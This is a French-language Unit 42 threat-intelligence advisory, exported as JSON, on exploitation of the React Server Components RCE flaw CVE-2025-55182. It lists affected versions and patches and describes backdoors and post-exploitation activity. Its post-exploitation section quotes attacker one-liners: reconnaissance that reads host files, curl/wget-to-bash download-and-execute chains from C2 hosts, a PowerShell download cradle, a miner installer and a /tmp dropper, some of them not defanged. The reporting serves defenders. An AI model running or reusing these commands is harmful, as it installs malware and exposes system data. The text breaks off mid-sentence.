{"id":167644,"date":"2025-12-12T09:01:33","date_gmt":"2025-12-12T17:01:33","guid":{"rendered":"https:\/\/unit42.paloaltonetworks.com\/?p=167644"},"modified":"2025-12-16T07:10:21","modified_gmt":"2025-12-16T15:10:21","slug":"cve-2025-55182-react-and-cve-2025-66478-next","status":"publish","type":"post","link":"https:\/\/unit42.paloaltonetworks.com\/fr\/cve-2025-55182-react-and-cve-2025-66478-next\/","title":{"rendered":"Exploitation d'une vuln\u00e9rabilit\u00e9 critique dans les React Server Components (Mise \u00e0 jour du 12 d\u00e9cembre)"},"content":{"rendered":"<h2><a id=\"post-167644-_7tpnnwjmbtd0\"><\/a>R\u00e9sum\u00e9 ex\u00e9cutif<\/h2>\n<h3>Mise \u00e0 jour du 12 d\u00e9cembre 2025<\/h3>\n<p><span style=\"font-weight: 400;\">Unit 42 a d\u00e9couvert KSwapDoor, une menace jusqu'alors in\u00e9dite. Cette backdoor Linux a \u00e9t\u00e9 initialement confondue avec BPFDoor.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Les principales caract\u00e9ristiques incluent :<\/span><\/p>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>R\u00e9seau maill\u00e9 P2P :<\/b><span style=\"font-weight: 400;\"> Permet un routage multi-sauts pour des communications C2 robustes<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>Chiffrement fort :<\/b><span style=\"font-weight: 400;\"> Utilise AES-256-CFB avec \u00e9change de cl\u00e9s Diffie-Hellman<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>Furtivit\u00e9 et persistance :<\/b><span style=\"font-weight: 400;\"> Imite un d\u00e9mon de swap du noyau Linux l\u00e9gitime<\/span><\/li>\n<\/ul>\n<p><b>Acc\u00e8s \u00e0 distance complet :<\/b><span style=\"font-weight: 400;\"> Offre un shell interactif, l'ex\u00e9cution de commandes, des op\u00e9rations sur les fichiers et le scan pour les mouvements lat\u00e9raux.<\/span><\/p>\n<h3><a id=\"post-167644-_zc14d6p151uk\"><\/a><strong>Mise \u00e0 jour<\/strong> du<strong> 9 d\u00e9cembre 2025<\/strong><\/h3>\n<p>Unit 42 a identifi\u00e9 une activit\u00e9 qui pr\u00e9senterait des chevauchements avec les outils de la campagne<a href=\"https:\/\/unit42.paloaltonetworks.com\/tag\/contagious-interview\/\" target=\"_blank\" rel=\"noopener\"> Contagious Interview<\/a> li\u00e9e \u00e0 la Cor\u00e9e du Nord (RPDC)<a href=\"https:\/\/unit42.paloaltonetworks.com\/tag\/contagious-interview\/\" target=\"_blank\" rel=\"noopener\">, bien qu'aucune attribution formelle n'ait \u00e9t\u00e9 faite \u00e0 ce jour.<\/a> Contagious Interview est une campagne o\u00f9 des acteurs malveillants associ\u00e9s \u00e0 la RPDC se font passer pour des recruteurs afin d'installer des logiciels malveillants sur les appareils de chercheurs d'emploi dans le secteur technologique.<\/p>\n<p>L'activit\u00e9 observ\u00e9e inclut l'utilisation d'EtherRAT. L\u2019agent de menace de la RPDC, UNC5342, utiliserait<a href=\"https:\/\/cloud.google.com\/blog\/topics\/threat-intelligence\/dprk-adopts-etherhiding\" target=\"_blank\" rel=\"noopener\"> la technique EtherHiding<\/a> pour la distribution de malwares et le vol de cryptomonnaies. EtherHiding tire parti de la technologie blockchain pour stocker et r\u00e9cup\u00e9rer des charges utiles malveillantes.<\/p>\n<p><span style=\"font-weight: 400;\">De plus, nous avons observ\u00e9 des instances de la porte d\u00e9rob\u00e9e Linux KSwapDoor (pr\u00e9c\u00e9demment identifi\u00e9e comme BPFDoor dans cet article avant le 12 d\u00e9cembre).\u00a0<\/span><\/p>\n<p>Enfin, Unit 42 a d\u00e9tect\u00e9 plusieurs instances d'une backdoor Auto-color jusqu'alors non document\u00e9e.<a href=\"https:\/\/unit42.paloaltonetworks.com\/new-linux-backdoor-auto-color\/\" target=\"_blank\" rel=\"noopener\"> Auto-color se fait passer pour une biblioth\u00e8que l\u00e9gitime Pluggable Authentication Module (PAM)<\/a> (<span style=\"font-family: 'courier new', courier, monospace;\">pamssod<\/span>).<\/p>\n<p>Plus de d\u00e9tails sont disponibles dans la section<a href=\"https:\/\/docs.google.com\/document\/d\/1-gOX3FcIqQx9xVjJNcelC4HmZbN0inNbt6PziWkZXZg\/edit?tab=t.0#heading=h.jh1zjkh1d3y7\" target=\"_blank\" rel=\"noopener\"> Port\u00e9e de l'activit\u00e9 post-exploitation<\/a>.<\/p>\n<h3><a id=\"post-167644-_stivtgl9k2po\"><\/a><strong>Mise \u00e0 jour du 8 d\u00e9cemb<\/strong>r<strong>e 2025<\/strong><\/h3>\n<p>Unit 42 a observ\u00e9 une activit\u00e9 post-exploitation suite \u00e0 l'exploitation de la CVE-2025-55182, indiquant de multiples vecteurs d'attaque. Cette attaque comprenait une reconnaissance initiale impliquant un scan automatis\u00e9 de la vuln\u00e9rabilit\u00e9 d'ex\u00e9cution de code \u00e0 distance (RCE) ainsi que des commandes encod\u00e9es en Base64 pour :<\/p>\n<ul>\n<li>Identifier rapidement (fingerprinting) les syst\u00e8mes compromis<\/li>\n<li>V\u00e9rifier les niveaux de privil\u00e8ges<\/li>\n<li>Cartographier les interfaces r\u00e9seau<\/li>\n<li>\u00c9num\u00e9rer les identifiants sensibles et les configurations DNS<\/li>\n<li>R\u00e9cup\u00e9rer des binaires malveillants depuis un C2 contr\u00f4l\u00e9 par l'attaquant<\/li>\n<\/ul>\n<p>Les attaquants ont proc\u00e9d\u00e9 aux activit\u00e9s d'installation, exploitant <span style=\"font-family: 'courier new', courier, monospace;\">wget<\/span> et <span style=\"font-family: 'courier new', courier, monospace;\">curl<\/span> pour t\u00e9l\u00e9charger et ex\u00e9cuter des scripts malveillants, notamment <span style=\"font-family: 'courier new', courier, monospace;\">sex.sh<\/span> et un dropper Linux (<span style=\"font-family: 'courier new', courier, monospace;\">x86_64<\/span>) con\u00e7u pour une infection persistante. Dans un cas, nous avons identifi\u00e9 un reverse shell bash connect\u00e9 \u00e0 un probable serveur Cobalt Strike.<\/p>\n<p>Par ailleurs, nous avons observ\u00e9 une activit\u00e9 coh\u00e9rente avec<a href=\"https:\/\/unit42.paloaltonetworks.com\/from-activity-to-formal-naming\/\" target=\"_blank\" rel=\"noopener\"> un cluster d'activit\u00e9 que nous suivons sous le nom de CL-STA-1015<\/a>, un courtier en acc\u00e8s initial (IAB) ayant des liens soup\u00e7onn\u00e9s avec le minist\u00e8re de la S\u00e9curit\u00e9 d'\u00c9tat de la RPC. Cette activit\u00e9 impliquait l'ex\u00e9cution sans fichier (fileless) d'un script shell malveillant (<span style=\"font-family: 'courier new', courier, monospace;\">slt<\/span>) via <span style=\"font-family: 'courier new', courier, monospace;\">curl<\/span> ou <span style=\"font-family: 'courier new', courier, monospace;\">wget<\/span>, suivie de l'installation des chevaux de Troie SNOWLIGHT et VShell.<\/p>\n<p>Plus de d\u00e9tails sont disponibles dans la section<a href=\"https:\/\/www.google.com\/search?q=https:\/\/unit42.paloaltonetworks.com\/cve-2025-55182-react-and-cve-2025-66478-next\/%23post-167619-_jh1zjkh1d3y7\" target=\"_blank\" rel=\"noopener\"> Port\u00e9e de l'activit\u00e9 post-exploitation<\/a>.<\/p>\n<hr \/>\n<p>Le 3 d\u00e9cembre 2025, des chercheurs ont divulgu\u00e9 publiquement des vuln\u00e9rabilit\u00e9s critiques d'ex\u00e9cution de code \u00e0 distance (RCE) dans le protocole Flight utilis\u00e9 par les React Server Components (RSC).<\/p>\n<p>\u00c0 l'origine, la faille \u00e9tait suivie comme deux vuln\u00e9rabilit\u00e9s distinctes :<a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2025-55182\" target=\"_blank\" rel=\"noopener\"> CVE-2025-55182<\/a> (React) et<a href=\"https:\/\/nextjs.org\/blog\/CVE-2025-66478\" target=\"_blank\" rel=\"noopener\"> CVE-2025-66478<\/a> (Next.js). Toutes deux ont re\u00e7u la note de s\u00e9v\u00e9rit\u00e9 maximale CVSS 10.0.<\/p>\n<p>La CVE-2025-66478 a depuis \u00e9t\u00e9 rejet\u00e9e car consid\u00e9r\u00e9e comme un doublon de la CVE-2025-55182.<\/p>\n<p>La faille permet \u00e0 des attaquants non authentifi\u00e9s d'ex\u00e9cuter du code arbitraire sur le serveur via une d\u00e9s\u00e9rialisation non s\u00e9curis\u00e9e de requ\u00eates HTTP malveillantes. Les tests indiquent que l'exploit a une fiabilit\u00e9 proche de 100 % et ne n\u00e9cessite aucune modification de code pour \u00eatre efficace contre les configurations par d\u00e9faut. Bien qu'aucun rapport d'exploitation dans la nature n'ait \u00e9t\u00e9 signal\u00e9 au 3 d\u00e9cembre 2025, Unit 42 a depuis observ\u00e9 une activit\u00e9 post-exploitation, comme d\u00e9taill\u00e9 dans nos mises \u00e0 jour.<\/p>\n<p>React est massivement impl\u00e9ment\u00e9 dans les environnements d'entreprise, utilis\u00e9 par environ 40 % de tous les d\u00e9veloppeurs, tandis que Next.js est utilis\u00e9 par environ 18 % \u00e0 20 %. Cela en fait le framework c\u00f4t\u00e9 serveur dominant pour l'\u00e9cosyst\u00e8me React.<\/p>\n<p>Palo Alto Networks<a href=\"https:\/\/www.paloaltonetworks.com\/cortex\/cortex-xpanse\" target=\"_blank\" rel=\"noopener\"> Cortex Xpanse<\/a> a identifi\u00e9 la pr\u00e9sence de plus de 968 000 instances React et Next.js dans notre t\u00e9l\u00e9m\u00e9trie.<\/p>\n<p>La CVE-2025-55182 impacte l'\u00e9cosyst\u00e8me React 19 et les frameworks qui l'impl\u00e9mentent. Plus pr\u00e9cis\u00e9ment, elle affecte les versions suivantes :<\/p>\n<ul>\n<li><strong>React :<\/strong> Versions 19.0, 19.1 et 19.2<\/li>\n<li><strong>Next.js :<\/strong> Versions 15.x et 16.x (App Router), ainsi que les builds Canary \u00e0 partir de la version 14.3.0<\/li>\n<li><strong>Autres frameworks :<\/strong> Toute biblioth\u00e8que int\u00e9grant l'impl\u00e9mentation <span style=\"font-family: 'courier new', courier, monospace;\">react-server<\/span>, y compris React Router, Waku, RedwoodSDK, Parcel et les plugins Vite RSC<\/li>\n<\/ul>\n<p>Les clients de Palo Alto Networks b\u00e9n\u00e9ficient de protections et de mesures d'att\u00e9nuation pour la CVE-2025-55182 via les moyens suivants :<\/p>\n<ul>\n<li><a href=\"https:\/\/docs.paloaltonetworks.com\/pan-os\/10-1\/pan-os-new-features\/url-filtering-features\/advanced-url-filtering\" target=\"_blank\" rel=\"noopener\">Advanced URL Filtering<\/a> et<a href=\"https:\/\/docs.paloaltonetworks.com\/dns-security\" target=\"_blank\" rel=\"noopener\"> Advanced DNS Security<\/a><\/li>\n<li><a href=\"https:\/\/docs.paloaltonetworks.com\/ngfw\" target=\"_blank\" rel=\"noopener\">Next-Generation Firewall<\/a> avec l'abonnement de s\u00e9curit\u00e9<a href=\"https:\/\/docs.paloaltonetworks.com\/advanced-threat-prevention\/administration\" target=\"_blank\" rel=\"noopener\"> Advanced Threat Prevention<\/a><\/li>\n<li>Les agents<a href=\"https:\/\/docs-cortex.paloaltonetworks.com\/p\/XDR\" target=\"_blank\" rel=\"noopener\"> Cortex XDR<\/a> et<a href=\"https:\/\/docs-cortex.paloaltonetworks.com\/p\/XSIAM\" target=\"_blank\" rel=\"noopener\"> XSIAM<\/a> aident \u00e0 prot\u00e9ger contre les activit\u00e9s post-exploitation gr\u00e2ce \u00e0 une approche de protection multicouche<\/li>\n<li><a href=\"https:\/\/www.paloaltonetworks.com\/cortex\/cortex-xpanse\" target=\"_blank\" rel=\"noopener\">Cortex Xpanse<\/a> est con\u00e7u pour identifier les appareils et applications expos\u00e9s sur l'internet public et remonter ces d\u00e9couvertes aux d\u00e9fenseurs<\/li>\n<li><a href=\"https:\/\/www.paloaltonetworks.com\/cortex\/cloud\" target=\"_blank\" rel=\"noopener\">Cortex Cloud<\/a> et<a href=\"https:\/\/www.paloaltonetworks.com\/prisma\/cloud\/cloud-code-security\" target=\"_blank\" rel=\"noopener\"> Prisma Cloud<\/a> disposent tous deux de capacit\u00e9s de d\u00e9tection pour les ressources cloud expos\u00e9es \u00e0 la vuln\u00e9rabilit\u00e9 abord\u00e9e dans ce bulletin<\/li>\n<\/ul>\n<p>Palo Alto Networks recommande \u00e9galement de passer imm\u00e9diatement aux versions durcies (hardened) suivantes :<\/p>\n<ul>\n<li><strong>React :<\/strong> Mettre \u00e0 jour vers 19.0.1, 19.1.2 ou 19.2.1<\/li>\n<li><strong>Next.js :<\/strong> Mettre \u00e0 jour vers les derni\u00e8res versions stables corrig\u00e9es, incluant 16.0.7, 15.5.7, 15.4.8, 15.3.6, 15.2.6, 15.1.9 ou 15.0.5<\/li>\n<\/ul>\n<p>L'<a href=\"https:\/\/start.paloaltonetworks.com\/contact-unit42.html\" target=\"_blank\" rel=\"noopener\">\u00e9quipe de r\u00e9ponse aux incidents de Unit 42<\/a> peut \u00eatre sollicit\u00e9e pour aider en cas de compromission ou pour fournir une \u00e9valuation proactive afin de r\u00e9duire vos risques.<\/p>\n<table style=\"width: 95.8606%;\">\n<thead>\n<tr>\n<td style=\"width: 35%;\"><b>Vuln\u00e9rabilit\u00e9s abord\u00e9es<\/b><\/td>\n<td style=\"width: 175.447%;\"><a href=\"https:\/\/unit42.paloaltonetworks.com\/fr\/tag\/cve-2025-55182-fr\/\" target=\"_blank\" rel=\"noopener\"><b>CVE-2025-55182<\/b><\/a>, <strong><a href=\"https:\/\/unit42.paloaltonetworks.com\/fr\/tag\/cve-2025-66478-fr\/\" target=\"_blank\" rel=\"noopener\">CVE-2025-66478<\/a><\/strong><\/td>\n<\/tr>\n<\/thead>\n<\/table>\n<h2><a id=\"post-167644-_gqlm2omyt9du\"><\/a>D\u00e9tails de la vuln\u00e9rabilit\u00e9 : CVE-2025-55182 (React)<\/h2>\n<p>La CVE-2025-55182 est class\u00e9e comme critique (CVSS 10.0) et est caus\u00e9e par une d\u00e9s\u00e9rialisation non s\u00e9curis\u00e9e au sein de l'architecture RSC, impliquant sp\u00e9cifiquement le protocole Flight.<\/p>\n<p>La vuln\u00e9rabilit\u00e9 r\u00e9side dans le paquet <span style=\"font-family: 'courier new', courier, monospace;\">react-server<\/span> et son impl\u00e9mentation du protocole RSC Flight. Il s'agit d'une faille logique de d\u00e9s\u00e9rialisation l\u00e0 o\u00f9 le serveur traite les charges utiles RSC en toute s\u00e9curit\u00e9.<\/p>\n<p>Lorsqu'un serveur re\u00e7oit une charge utile HTTP sp\u00e9cialement con\u00e7ue et malform\u00e9e (g\u00e9n\u00e9ralement via des donn\u00e9es transmises dans une requ\u00eate POST), il ne parvient pas \u00e0 valider correctement la structure des donn\u00e9es. En raison de cette d\u00e9s\u00e9rialisation non s\u00e9curis\u00e9e, le serveur permet aux donn\u00e9es contr\u00f4l\u00e9es par l'attaquant d'influencer la logique d'ex\u00e9cution c\u00f4t\u00e9 serveur.<\/p>\n<p>Cela aboutit \u00e0 une RCE, permettant \u00e0 un attaquant d'ex\u00e9cuter du code JavaScript arbitraire avec privil\u00e8ges sur le serveur.<\/p>\n<h3><a id=\"post-167644-_bg6qvymex9fq\"><\/a><strong>Vecteur d'attaque et exploitabilit\u00e9<\/strong><\/h3>\n<ul>\n<li><strong>Complexit\u00e9 de l'attaque :<\/strong> La complexit\u00e9 de l'attaque est faible. Elle ne n\u00e9cessite aucune interaction de l'utilisateur et aucun privil\u00e8ge (non authentifi\u00e9e).<\/li>\n<li><strong>Endpoints cibles :<\/strong> L'attaque cible les endpoints React Server Function.\n<ul>\n<li><strong>Nuance critique :<\/strong> M\u00eame si une application n'impl\u00e9mente pas ou n'utilise pas strictement les React Server Functions, elle reste vuln\u00e9rable si l'application prend en charge les React Server Components de mani\u00e8re g\u00e9n\u00e9rale.<\/li>\n<\/ul>\n<\/li>\n<li><strong>Fiabilit\u00e9 :<\/strong> Les tests ont montr\u00e9 que l'exploit a une fiabilit\u00e9 proche de 100 %.<\/li>\n<li><strong>Configuration par d\u00e9faut :<\/strong> La vuln\u00e9rabilit\u00e9 est pr\u00e9sente dans les configurations par d\u00e9faut. Par exemple, une application Next.js standard cr\u00e9\u00e9e avec <span style=\"font-family: 'courier new', courier, monospace;\">create-next-app<\/span> et compil\u00e9e pour la production est exploitable sans aucune modification de code par le d\u00e9veloppeur.<\/li>\n<\/ul>\n<h3><a id=\"post-167644-_pe9o9uy9245h\"><\/a><strong>Composants sp\u00e9cifiques affect\u00e9s<\/strong><\/h3>\n<p>Bien que g\u00e9n\u00e9ralement d\u00e9crite comme affectant React et Next.js, la vuln\u00e9rabilit\u00e9 existe techniquement au sein de paquets sous-jacents sp\u00e9cifiques qui g\u00e8rent le rendu c\u00f4t\u00e9 serveur et le chargement de modules.<\/p>\n<h4><a id=\"post-167644-_7dskmdiovq50\"><\/a>Paquets affect\u00e9s<\/h4>\n<p>La vuln\u00e9rabilit\u00e9 est pr\u00e9sente dans les versions 19.0.0, 19.1.0, 19.1.1 et 19.2.0 des paquets suivants :<\/p>\n<ul>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">react-server-dom-webpack<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">react-server-dom-parcel<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">react-server-dom-turbopack<\/span><\/li>\n<\/ul>\n<h4><a id=\"post-167644-_21e7h22ihg3i\"><\/a>Impl\u00e9mentations de frameworks affect\u00e9es<\/h4>\n<p>Tout framework int\u00e9grant ces paquets est affect\u00e9 :<\/p>\n<ul>\n<li><strong>Next.js :<\/strong> Versions 15.x et 16.x (App Router), ainsi que les builds Canary \u00e0 partir de 14.3.0-canary.77<\/li>\n<li><strong>Autres \u00e9cosyst\u00e8mes :<\/strong> React Router, Waku, RedwoodSDK, Parcel et le plugin Vite RSC sont tous affect\u00e9s s'ils utilisent les paquets React vuln\u00e9rables.<\/li>\n<\/ul>\n<h2><a id=\"post-167644-_73u610pyg7np\"><\/a>Port\u00e9e de l'activit\u00e9 post-exploitation<\/h2>\n<p>Unit 42 a observ\u00e9 des sessions interactives li\u00e9es \u00e0 l'exploitation de la CVE-2025-55182, incluant :<\/p>\n<ul>\n<li>Scan de serveurs vuln\u00e9rables \u00e0 la RCE<\/li>\n<li>Reconnaissance<\/li>\n<li>Tentative de vol de fichiers de configuration et d'identifiants cloud<\/li>\n<li>Installation de downloaders pour r\u00e9cup\u00e9rer des charges utiles depuis l'infrastructure de commande et contr\u00f4le (C2) de l'attaquant<\/li>\n<li>Tentatives d'installation de Cobalt Strike<\/li>\n<li>Scripts dropper malveillants<\/li>\n<li>Logiciels de cryptomining<\/li>\n<li>Web shells interactifs se faisant passer pour un gestionnaire de fichiers React<\/li>\n<li>Ex\u00e9cution et installation de NOODLERAT<\/li>\n<li>Activit\u00e9 de courtier en acc\u00e8s initial (IAB)<\/li>\n<li>Ex\u00e9cution d'\u00e9l\u00e9ments li\u00e9s \u00e0 SNOWLIGHT et VShell<\/li>\n<\/ul>\n<h3><a id=\"post-167644-_ahibkumbrg\"><\/a><strong>Scan<\/strong><\/h3>\n<p>Nous observons des scans automatis\u00e9s pour la vuln\u00e9rabilit\u00e9 RCE :<\/p>\n<pre class=\"lang:default decode:true\">\/bin\/sh -c echo $((288*288))\r\n\r\n\/bin\/sh -c echo $((40453*43186))\r\n\/bin\/sh -c powershell -c \\288*288\\\r\n\r\n\/bin\/sh -c $(curl -s http:\/\/help.093214[.]xyz:9731\/fn32.sh | bash | gzip -n | base64 -w0),\/bin\/sh -c echo VULN_CHECK_SUCCESS<\/pre>\n<p>La reconnaissance par l'attaquant a \u00e9t\u00e9 observ\u00e9e sous la forme de l'envoi de commandes encod\u00e9es en Base64 pour obtenir une connaissance situationnelle imm\u00e9diate apr\u00e8s la compromission d'un syst\u00e8me. Les attaquants identifient rapidement le syst\u00e8me d'exploitation et l'architecture (<span style=\"font-family: 'courier new', courier, monospace;\">uname<\/span>), v\u00e9rifient leur niveau de privil\u00e8ge actuel (<span style=\"font-family: 'courier new', courier, monospace;\">id<\/span>) et cartographient les interfaces r\u00e9seau (<span style=\"font-family: 'courier new', courier, monospace;\">hostname<\/span>).<\/p>\n<p>La s\u00e9quence se termine par l'\u00e9num\u00e9ration du syst\u00e8me de fichiers \u00e0 la recherche d'identifiants sensibles et l'analyse des configurations DNS (<span style=\"font-family: 'courier new', courier, monospace;\">resolv.conf<\/span>) pour identifier les environnements cloud ou les cibles internes pour un mouvement lat\u00e9ral.<\/p>\n<p>Le format pour ex\u00e9cuter les commandes de reconnaissance est :<\/p>\n<pre class=\"lang:default decode:true\">\/bin\/sh -c echo &lt;base64-encoded text&gt; | base64 -d | sh | base64 -w0<\/pre>\n<p>La commande Base64 d\u00e9cod\u00e9e ex\u00e9cute les commandes de reconnaissance suivantes :<\/p>\n<pre class=\"lang:default decode:true\">\/bin\/sh uname -a ; id ;hostname -I ; ls -la \/ ; ls -la ~ ;cat \/etc\/hosts;cat \/etc\/resolv.conf<\/pre>\n<h3><a id=\"post-167644-_e1lxs39lzkdf\"><\/a><strong>Activit\u00e9 d'installation de malwares<\/strong><\/h3>\n<p>Unit 42 a observ\u00e9 plusieurs clusters d'activit\u00e9 li\u00e9s au d\u00e9ploiement de logiciels de cryptomining, ainsi que d'autres loaders de malwares courants (commodity malware).<\/p>\n<p>Dans un cas, les attaquants ont transmis une s\u00e9quence d'attaque \"t\u00e9l\u00e9chargement et ex\u00e9cution\" utilisant <span style=\"font-family: 'courier new', courier, monospace;\">wget<\/span> pour r\u00e9cup\u00e9rer un script malveillant (nomm\u00e9 <span style=\"font-family: 'courier new', courier, monospace;\">sex.sh<\/span>) depuis un serveur C2 contr\u00f4l\u00e9 par l'attaquant. L'attaquant a utilis\u00e9 l'op\u00e9rateur &amp;&amp; pour cr\u00e9er une cha\u00eene conditionnelle, garantissant que le script malveillant ne soit pass\u00e9 \u00e0 l'interpr\u00e9teur bash pour ex\u00e9cution imm\u00e9diate qu'apr\u00e8s avoir \u00e9t\u00e9 t\u00e9l\u00e9charg\u00e9 avec succ\u00e8s sur le disque.<\/p>\n<p>Dans un autre cas, un script automatis\u00e9 a \u00e9t\u00e9 utilis\u00e9 pour effectuer du vol de donn\u00e9es, de la v\u00e9rification et l'installation de multiples downloaders de malwares, coh\u00e9rent avec une activit\u00e9 ciblant l'Internet des objets (IoT) telle qu'un<a href=\"https:\/\/unit42.paloaltonetworks.com\/tag\/mirai\/\" target=\"_blank\" rel=\"noopener\"> botnet Mirai<\/a>.<\/p>\n<p>Les commandes neutralis\u00e9es (defanged) sont :<\/p>\n<pre class=\"lang:default decode:true\">\/bin\/sh -c wget hxxp[:]\/\/46.36.37[.]85:12000\/sex.sh &amp;&amp; bash sex.sh\r\n\r\n\/bin\/sh -c $(curl -s http:\/\/keep.camdvr[.]org:8000\/d5.sh | bash | gzip -n | base64 -w0),\/bin\/sh -c echo $((41*271)),\/bin\/sh -c echo $((42259*42449)),\/bin\/sh -c wget http:\/\/superminecraft.net[.]br:3000\/sex.sh &amp;&amp; bash sex.sh,\/bin\/sh -c wget https:\/\/sup001.oss-cn-hongkong.aliyuncs[.]com\/123\/python1.sh &amp;&amp; chmod 777 python1.sh &amp;&amp; .\/python1.sh\r\n\r\n45.134.174[.]235\/2.sh\r\n\r\n45.134.174[.]235\/solra\r\n\r\n45.134.174.235\/?h=45.134.174.235&amp;p=80&amp;t=tcp&amp;a=l64&amp;stage=true\r\n\r\nDecoded and Defanged command:\r\n\r\n\/bin\/sh -c (wget -qO- http:\/\/156.234.209[.]103:20912\/get.sh || curl -fsSL http:\/\/156.234.209[.]103:20912\/get.sh) | bash,\/bin\/sh -c curl -s -L https:\/\/raw.githubusercontent.com\/C3Pool\/xmrig_setup\/master\/setup_c3pool_miner .sh | bash -s &lt;encoded Monero address&gt;,\/bin\/sh -c echo $((41*271)),\/bin\/sh -c echo $((42636*43926)),\/bin\/sh -c powershell -enc IEX (New-Object System.Net.Webclient).DownloadString('http:\/\/156.234.209[.]103:63938\/nrCrQ')\r\n\r\nDecoded and Defanged command:\r\n\r\n\/bin\/sh -c echo wget -O \/tmp\/test.sh http:\/\/31.57.46.28\/test.sh&amp;&amp;sh \/tmp\/test.sh|base64 -d|sh,\/bin\/sh -c id &amp;&amp; pwd &amp;&amp; ls -la &amp;&amp; ps aux | grep node\r\n\r\n(command -v curl &gt;\/dev\/null 2&gt;&amp;1 &amp;&amp; curl -s hxxp:\/\/47.84.57[.]207\/index | bash) || (command -v wget &gt;\/dev\/null 2&gt;&amp;1 &amp;&amp; wget -q -O- hxxp:\/\/47.84.57[.]207\/index | bash) || (command -v python3 &gt;\/dev\/null 2&gt;&amp;1 &amp;&amp; python3 -c \"import urllib.request as u,subprocess; subprocess.Popen(['bash'], stdin=subprocess.PIPE).communicate(u.urlopen('hxxp:\/\/47.84.57.207\/index').read())\") || (command -v python &gt;\/dev\/null 2&gt;&amp;1 &amp;&amp; python -c \"import urllib2 as u,subprocess; subprocess.Popen(['bash'], stdin=subprocess.PIPE).communicate(u.urlopen('hxxp:\/\/47.84.57[.]207\/index').read())\")<\/pre>\n<p>La figure 1 illustre le d\u00e9roulement de l'attaque du d\u00e9ploiement XMRIG tel qu'il appara\u00eet dans Cortex XDR.<\/p>\n<figure id=\"attachment_168388\" aria-describedby=\"caption-attachment-168388\" style=\"width: 1000px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-168388 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/12\/word-image-861048-167644-1.png\" alt=\"Arborescence des processus Cortex XDR pour le d\u00e9ploiement de logiciels malveillants. La capture d'\u00e9cran montre deux chemins d'acc\u00e8s \u00e0 des points d'ex\u00e9cution distincts. Le chemin est marqu\u00e9 par des ic\u00f4nes repr\u00e9sentant des symboles d'avertissement, indiquant le d\u00e9roulement de l'attaque. \" width=\"1000\" height=\"191\" srcset=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/12\/word-image-861048-167644-1.png 1557w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/12\/word-image-861048-167644-1-786x150.png 786w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/12\/word-image-861048-167644-1-768x146.png 768w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/12\/word-image-861048-167644-1-1536x293.png 1536w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><figcaption id=\"caption-attachment-168388\" class=\"wp-caption-text\">Figure 1. Flux d'attaque du d\u00e9ploiement de XMRIG.<\/figcaption><\/figure>\n<p>La Figure 2 est une notification d'alerte dans Cortex XDR pour l'activit\u00e9 XMRig.<\/p>\n<figure id=\"attachment_168399\" aria-describedby=\"caption-attachment-168399\" style=\"width: 461px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-168399 size-full lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/12\/word-image-863756-167644-2.png\" alt=\"Capture d'\u00e9cran de l'alerte Cortex XDR. Certaines informations ont \u00e9t\u00e9 masqu\u00e9es. La communication du pool de minage cryptographique a \u00e9t\u00e9 bloqu\u00e9e et l'alerte a \u00e9t\u00e9 class\u00e9e comme malware. \" width=\"461\" height=\"606\" srcset=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/12\/word-image-863756-167644-2.png 461w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/12\/word-image-863756-167644-2-335x440.png 335w\" sizes=\"(max-width: 461px) 100vw, 461px\" \/><figcaption id=\"caption-attachment-168399\" class=\"wp-caption-text\">Figure 2. Alerte Cortex XDR pour l'activit\u00e9 XMRig.<\/figcaption><\/figure>\n<p>Dans une observation, l'attaquant a install\u00e9 un dropper con\u00e7u pour infecter les syst\u00e8mes Linux. Le dropper utilise un bloc logique redondant pour s'assurer que la charge utile est d\u00e9livr\u00e9e. Il tente d'abord de r\u00e9cup\u00e9rer le binaire via <span style=\"font-family: 'courier new', courier, monospace;\">curl<\/span> avec des options pour masquer la sortie et suivre les redirections, et se replie sur <span style=\"font-family: 'courier new', courier, monospace;\">wget<\/span> si le premier outil est manquant ou \u00e9choue.<\/p>\n<p>Une fois le t\u00e9l\u00e9chargement r\u00e9ussi dans le r\u00e9pertoire <span style=\"font-family: 'courier new', courier, monospace;\">\/tmp<\/span>, le script ex\u00e9cute une cha\u00eene de commandes pour rendre le fichier ex\u00e9cutable universellement. Il lance ensuite imm\u00e9diatement la charge utile, \u00e9tablissant l'infection sans intervention de l'utilisateur.<\/p>\n<p>La commande neutralis\u00e9e pour ceci est :<\/p>\n<pre class=\"lang:default decode:true\">\/bin\/sh -c ((curl -sL hxxp[:]\/\/45.32.158[.]54\/5e51aff54626ef7f\/x86_64 -o \/tmp\/x86_64;chmod 777 \/tmp\/x86_64;\/tmp\/x86_64) || (wget hxxp[:]\/\/45.32.158[.]54\/5e51aff54626ef7f\/x86_64 -O \/tmp\/x86_64;chmod 777 \/tmp\/x86_64;\/tmp\/x86_64))<\/pre>\n<h3><a id=\"post-167644-_njq4nxv4ax0s\"><\/a><b>Tentatives d'exploitation du Cloud et des conteneurs<\/b><\/h3>\n<p>Unit 42 a \u00e9galement observ\u00e9 des tentatives d'exploitation de React2Shell sur les principales plateformes cloud. Celles-ci ciblaient des instances cloud h\u00e9bergeant des conteneurs, notamment sous Kubernetes, et ex\u00e9cutant des applications rendues vuln\u00e9rables \u00e0 la CVE-2025-55182 par des composants React int\u00e9gr\u00e9s.<\/p>\n<p>Les op\u00e9rations impliquaient l'ex\u00e9cution en ligne de commande de <span style=\"font-family: 'courier new', courier, monospace;\">wget, curl, 